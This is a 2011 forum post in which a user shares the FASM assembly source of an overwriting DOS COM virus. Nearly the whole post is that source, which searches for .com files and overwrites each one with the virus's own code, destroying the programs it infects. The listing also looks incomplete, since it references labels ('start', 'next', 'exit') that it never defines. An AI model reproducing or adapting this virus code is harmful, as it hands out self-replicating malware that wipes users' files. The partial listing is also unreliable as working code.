Joined: 06 Jan 2011
Posts: 200
me239 04 Feb 2011, 03:58
Hello everyone, I wanted to show a simpler example of my previous post. This is an overwritting COM virus in FASM:
org 100h
        xor cx, cx ; normal file attributes
        mov dx, comfile ; comfile wild card
        mov ah, 4eh ; find first file
        int 21h ; find file
        jc exit ; if error, exit
        mov ax, 3d02h ; open read/write
        mov dx, 9eh ; 9eh = offset in DTA of file found with 4eh/4fh
        int 21h ; open it
        xchg   ax, bx ; save handle
        mov ah, 40h ; write function
        mov dx, start ; copy starting at 'start'
        mov cx, vend-start ; size = vend-start
        int 21h ; infect
        mov ah, 3eh ;close file handle
        int 21h ; close it
        mov ah, 4fh ; find next file
        jmp next ; jump back to search loop
        int 20h ; standard COM exit
comfile db "*.com", 0 ; com wildcard always NULLED at end
vend: ;end of code for size calculation
04 Feb 2011, 03:58
